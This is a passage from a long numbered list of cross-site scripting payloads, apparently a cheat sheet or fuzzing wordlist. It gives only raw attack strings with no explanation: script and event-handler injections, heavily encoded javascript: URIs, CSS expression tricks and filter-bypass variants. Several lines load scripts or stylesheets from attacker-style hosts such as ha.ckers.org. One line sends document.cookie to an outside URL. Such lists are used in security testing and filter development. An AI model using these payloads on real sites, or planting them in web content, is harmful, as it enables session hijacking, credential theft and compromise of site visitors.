  3769. <link rel=’preload’ href=’#’ as=’script’ onload=’confirm(203)’>
  3770. <link rel=’preload’ href=’#’ as=’script’ onload=’confirm(domain)’>
  3771. <link rel=stylesheet href=//attacker/test.css>
  3772. <link rel=stylesheet href=’data:,?*%7bx:expression(alert(1))%7D’ >
  3773. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  3774. <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d>
  3775. <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
  3776. <link rel=stylesheet href=’data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D’ >
  3777. <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css">
  3778. “><link rel=”stylesheet” href=”http://8ant.org/asdfqwer.css"><"
  3779. <;LINK REL=”;stylesheet”; HREF=”;http://ha.ckers.org/xss.css";>;
  3780. <LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css">
  3781. <link rel = “stylesheet” href =”http://www.xxx.com/atack.css">
  3782. <LINK REL=”stylesheet” HREF=”http://xss.cx/xss.css">
  3783. <LINK REL=”stylesheet” HREF=”http://xxxx.com/xss.css">
  3784. <LINK REL=”stylesheet” href=”javascript:alert(‘XlSS’);”>
  3785. <;LINK REL=”;stylesheet”; HREF=”;javascript:alert(‘;XSS’;);”;>;
  3786. <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
  3787. <LINK REL=”stylesheet” HREF=”javascript:alert(XSS);”>
  3788. <LINK REL=”stylesheet” HREF=”javascript:confirm(document.location);”>
  3789. <link rel=”stylesheet” href=”javascript:document.vulnerable=true;”>
  3790. <link REL=”stylesheet” HREF=”javascript:document.vulnerable=true;”>
  3791. <LINK REL=”stylesheet” HREF=”javascript:javascript:alert(1);”>
  3792. <listener event=”load” handler=”#y” xmlns=”http://www.w3.org/2001/xml-events" observer=”x”/>
  3793. <listing>&lt;img src=1 onerror=alert(1) &gt;</listing>
  3794. <listing>&ltimg src=x onerror=confirm(1)&gt</listing>
  3795. <li style=”color:rgb(‘’0,0,&#0;javascript:expression(confirm(1))”>XSS</li>
  3796. <li style=list-style:url() onerror=alert(1)>
  3797. <li style=list-style:url() onerror=alert(1)></li>
  3798. <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  3799. <LoadingMovMinDuration>3</LoadingMovMinDuration>
  3800. <LoadingMovPercentToLoad>50</LoadingMovPercentToLoad>
  3801. <LoadingMovURL>http://thebest404pageever.com/swf/FUUUUUUUUUUUUUUUUUUUUUUUUUCK.swf</LoadingMovURL>
  3802. <! — localhost/xss.php?q=PAYLOAD →
  3803. location+=[]
  3804. location=’&#118&#98&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'
  3805. =location=a?jav\x41script\x3aconfirm\x28a3ZDresearcha?\x29a2>ZDresearch
  3806. location.assign`javascript:alert(1)`
  3807. Location Based Payloads V Part I
  3808. Location.hash[1] = :
  3809. Location.hash[2]= (
  3810. Location.hash[3] = )
  3811. (location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}//<img src=”x:x” onerror=”if(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}”>
  3812. ;location.href=’http://site’;//
  3813. “;location.href='http://site';//
  3814. location.href`javascript:alert(1)`
  3815. location=`http://google.com/csi ?${escape(document.cookie)}`;
  3816. location=/http/.source+/:/.source[0]+/\//.source[1]+/\//.source[1]+/google.com/.source
  3817. location=’http://\u{e01cc}\u{e01cd}\u{e01ce}\u{e01cf}\u{e01d0}\u{e01d1}\u{e01d2}\u{e01d3}\u{e01d4}\u{e01d5}google\u{e01da}\u{e01db}\u{e01dc}\u{e01dd}\u{e01de}\u{e01df}.com'
  3818. location=’javasc&#114ipt&#58alert&#40~1&#41'
  3819. ‘;location=’javascript://’%2Blocation.hash;’
  3820. location=’javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)’
  3821. location=’javascript:%61%6c%65%72%74%28%31%29'
  3822. location=’javascript:alert(0)’;
  3823. location`javascript:alert(1)`
  3824. location=’javascript:ale’+’rt(12)’;
  3825. location=javascript:confirm(0);.
  3826. location=’javascript://\u2028alert(1)’;
  3827. location=location.hash
  3828. “;location=location.hash)//#0={};alert(0)
  3829. location=location.hash //FF only
  3830. location=location.hash.slice(1);
  3831. location=location.hash.slice(1); //avoid the #
  3832. “;location=name;//
  3833. location=name;
  3834. location=name
  3835. location=name//’,’javascript:alert(1)’);
  3836. location.reload`javascript:alert(1)`
  3837. location.replace`javascript:alert(1)`
  3838. location.search, tagName, nodeName, outerHTML
  3839. location=unescape`%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D`
  3840. Lol:Function`alert(1)```````````
  3841. LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  3842. lol video<!V”href=javascript:alert(1) style=font-size:50px;
  3843. lol video<!Vhref=javascript:alert(1) style=font-size:50px;display:block;color:transparent;
  3844. ( = &lpar;
  3845. &lt;
  3846. &lt
  3847. &LT;
  3848. &LT
  3849. &lt;!&#91;endif&#93; — &gt;
  3850. &lt;! — &#91;if gte IE 4&#93;&gt;
  3851. &lt;A HREF=\”//google\”&gt;XSS&lt;/A&gt;
  3852. &lt;A HREF=\”http&#58;//0102&#46;0146&#46;0007&#46;00000223/\”&gt;XSS&lt;/A&gt;
  3853. &lt;A HREF=\”http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\”&gt;XSS&lt;/A&gt;
  3854. &lt;A HREF=\”http&#58;//1113982867/\”&gt;XSS&lt;/A&gt;
  3855. &lt;A HREF=\”htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\”&gt;XSS&lt;/A&gt;
  3856. &lt;A HREF=\”htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\”&gt;XSS&lt;/A&gt;
  3857. &lt;A HREF=\”http&#58;//66&#46;102&#46;7&#46;147/\”&gt;XSS&lt;/A&gt;
  3858. &lt;A HREF=\”http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”&gt;XSS&lt;/A&gt;
  3859. &lt;A HREF=\”http&#58;//google&#46;com/\”&gt;XSS&lt;/A&gt;
  3860. &lt;A HREF=\”http&#58;//google&#58;ha&#46;ckers&#46;org\”&gt;XSS&lt;/A&gt;
  3861. &lt;A HREF=\”http&#58;//ha&#46;ckers&#46;org@google\”&gt;XSS&lt;/A&gt;
  3862. &lt;A HREF=\”http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\”&gt;XSS&lt;/A&gt;
  3863. &lt;A HREF=\”http&#58;//www&#46;google&#46;com&#46;/\”&gt;XSS&lt;/A&gt;
  3864. &lt;a href="http://i.imgur.com/b7sajuK.jpg" download&gt;<a href=”http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a>&lt;/a&gt;
  3865. &lt;A HREF=\”javascript&#058;document&#46;location=’http&#58;//www&#46;google&#46;com/’\”&gt;XSS&lt;/A&gt;
  3866. &lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;
  3867. &lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;
  3868. &lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;
  3869. &lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;
  3870. &lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;
  3871. &lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;
  3872. &lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;
  3873. &lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;
  3874. &lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;
  3875. &lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;
  3876. &lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;
  3877. &lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;
  3878. &lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;
  3879. &lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;
  3880. &lt;A HREF=\”//www&#46;google&#46;com/\”&gt;XSS&lt;/A&gt;
  3881. &lt;BASE HREF=\”javascript&#058;alert(‘XSS’);//\”&gt;
  3882. &lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
  3883. &lt;BGSOUND SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
  3884. &lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3885. &lt;BODY BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
  3886. &lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3887. &lt;/BODY&gt;&lt;/HTML&gt;
  3888. &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\”XSS\”)&gt;
  3889. &lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
  3890. &lt;BODY ONLOAD=alert(‘XSS’)&gt;
  3891. &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
  3892. &lt;BR SIZE=\”&{alert(‘XSS’)}\”&gt;
  3893. &lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;
  3894. &lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
  3895. &lt;/br style=a:expression(alert())&gt;
  3896. &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  3897. &lt;DIV STYLE=\”background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\”&gt;
  3898. &lt;DIV STYLE=\”background-image&#58; url(javascript&#058;alert(‘XSS’))\”&gt;
  3899. &lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;
  3900. &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
  3901. &lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
  3902. &lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
  3903. &lt;DIV STYLE=\”width&#58; expression(alert(‘XSS’));\”&gt;
  3904. &lt;? echo(&apos;&lt;SCR)&apos;;
  3905. &lt;? echo(‘&lt;SCR)’;
  3906. &lt;EMBED SRC=\”data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”&gt;&lt;/EMBED&gt;
  3907. &lt;EMBED SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\” AllowScriptAccess=\”always\”&gt;&lt;/EMBED&gt;
  3908. &lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
  3909. &lt;! — #exec cmd=\”/bin/echo ‘&lt;SCR’\” — &gt;&lt;! — #exec cmd=\”/bin/echo ‘IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;’\” — &gt;
  3910. &lt;! — #exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot; — &gt;&lt;! — #exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
  3911. &lt;FRAMESET&gt;&lt;FRAME SRC=\”javascript&#058;alert(‘XSS’);\”&gt;&lt;/FRAMESET&gt;
  3912. &lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
  3913. &lt;HEAD&gt;&lt;META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
  3914. &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-
  3915. &lt;HTML&gt;&lt;BODY&gt;
  3916. &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\”xss\” implementation=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\”&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
  3917. &lt;HTML xmlns:xss&gt;
  3918. &lt;! — [if gte IE 4]&gt;
  3919. &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
  3920. &lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
  3921. &lt;IFRAME SRC=\”javascript&#058;alert(‘XSS’);\”&gt;&lt;/IFRAME&gt;
  3922. &lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
  3923. &lt;IMG DYNSRC=\”javascript&#058;alert(‘XSS’)\”&gt;
  3924. &lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3925. &lt;IMG \”\”\”&gt;&lt;SCRIPT&gt;alert(\”XSS\”)&lt;/SCRIPT&gt;\”&gt;
  3926. &lt;IMG LOWSRC=\”javascript&#058;alert(‘XSS’)\”&gt;
  3927. &lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3928. &lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
  3929. &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
  3930. &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
  3931. &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
  3932. &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
  3933. &lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
  3934. &lt;IMG SRC=\”http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\”&gt;
  3935. &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
  3936. &lt;IMG SRC=`javascript&#058;alert(\”RSnake says, ‘XSS’\”)`&gt;
  3937. &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
  3938. &lt;IMG SRC=\”javascript&#058;alert(‘XSS’)\”
  3939. &lt;IMG SRC=\” javascript&#058;alert(‘XSS’);\”&gt;
  3940. &lt;IMG SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
  3941. &lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt;
  3942. &lt;IMG SRC=JaVaScRiPt&#058;alert(‘XSS’)&gt;
  3943. &lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
  3944. &lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
  3945. &lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;
  3946. &lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;
  3947. &lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
  3948. &lt;IMG SRC=\”jav&#x09;ascript&#058;alert(‘XSS’);\”&gt;
  3949. &lt;IMG SRC=\”jav&#x0A;ascript&#058;alert(‘XSS’);\”&gt;
  3950. &lt;IMG SRC=\”jav&#x0D;ascript&#058;alert(‘XSS’);\”&gt;
  3951. &lt;IMG SRC=\”livescript&#058;&#91;code&#93;\”&gt;
  3952. &lt;IMG SRC=\”mocha&#58;&#91;code&#93;\”&gt;
  3953. &lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3954. &lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
  3955. &lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  3956. &lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  3957. &lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  3958. &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;
  3959. &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3960. &lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  3961. &lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
  3962. &lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
  3963. &lt;IMG SRC=’vbscript&#058;msgbox(\”XSS\”)’&gt;
  3964. &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
  3965. &lt;img src=xx:x onerror=confirm(1)&gt;<script>document.body.innerHTML=document.body.innerText||document.body.textContent</script>
  3966. &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;
  3967. &lt;IMG STYLE=\”xss&#58;expr/*XSS*/ession(alert(‘XSS’))\”&gt;
  3968. &lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;
  3969. &lt;?import namespace=\”t\” implementation=\”#default#time2\”&gt;
  3970. &lt;INPUT TYPE=\”IMAGE\” SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
  3971. &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3972. &lt;label class=”&lt;% confirm(1) %&gt;”&gt;
  3973. &lt;LAYER SRC=\”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\”&gt;&lt;/LAYER&gt;
  3974. &lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
  3975. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
  3976. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3977. &lt;LINK REL=\”stylesheet\” HREF=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;css\”&gt;
  3978. &lt;LINK REL=\”stylesheet\” HREF=\”javascript&#058;alert(‘XSS’);\”&gt;
  3979. &lt;&lt;SCRIPT>alert(“XSS”);//&lt;&lt;/SCRIPT>
  3980. &lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
  3981. &lt;&lt;SCRIPT&gt;alert(\”XSS\”);//&lt;&lt;/SCRIPT&gt;
  3982. &lt;META HTTP-EQUIV=\”Link\” Content=\”&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\”&gt;
  3983. &lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
  3984. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
  3985. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3986. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
  3987. &lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
  3988. &lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”&gt;
  3989. &lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”&gt;&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http&#58;//;URL=javascript&#058;alert(‘XSS’);\”
  3990. &lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http&#58;//;URL=javascript&#058;alert(‘XSS’);\”
  3991. &lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript&#058;alert(‘XSS’);\”&gt;
  3992. &lt;META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;\”&gt;
  3993. &lt;OBJECT classid=clsid&#58;ae24fdae-03c6–11d1–8b76–0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(‘XSS’)&gt;&lt;/OBJECT&gt;
  3994. &lt;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
  3995. &lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
  3996. &lt;OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\”&gt;&lt;/OBJECT&gt;
  3997. &lt;SCRIPT a=\”&gt;’&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  3998. &lt;SCRIPT \”a=’&gt;’\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  3999. &lt;SCRIPT a=`&gt;` SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  4000. &lt;SCRIPT a=\”&gt;\” ‘’ SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  4001. &lt;SCRIPT a=\”&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  4002. &lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  4003. &lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  4004. &lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  4005. &lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  4006. &lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
  4007. &lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
  4008. &ltscript&gtalert(document.cookie);&ltscript&gtalert
  4009. &ltscript&gtalert(document.cookie);</script>
  4010. &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  4011. &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  4012. &lt;SCRIPT&gt;alert(‘XSS’);&lt;/SCRIPT&gt;
  4013. &lt;SCRIPT&gt;a=/XSS/
  4014. &lt;SCRIPT&gt;document&#46;write(\”&lt;SCRI\”);&lt;/SCRIPT&gt;PT SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  4015. &lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  4016. &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
  4017. &lt;/script&gt;&lt;script&gt;confirm(1)&lt;/script&gt;
  4018. &lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;
  4019. &lt;SCRIPT =\”&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  4020. &lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  4021. &lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  4022. &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
  4023. &lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
  4024. &lt;SCRIPT SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\”&gt;&lt;/SCRIPT&gt;
  4025. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
  4026. &lt;SCRIPT/SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  4027. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
  4028. &lt;SCRIPT SRC=http://ha.ckers.org/xss.js
  4029. &lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
  4030. &lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
  4031. &lt;SCRIPT/XSS SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  4032. &lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  4033. &lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;
  4034. &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  4035. &lt;SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”&gt;&lt;/SPAN&gt;
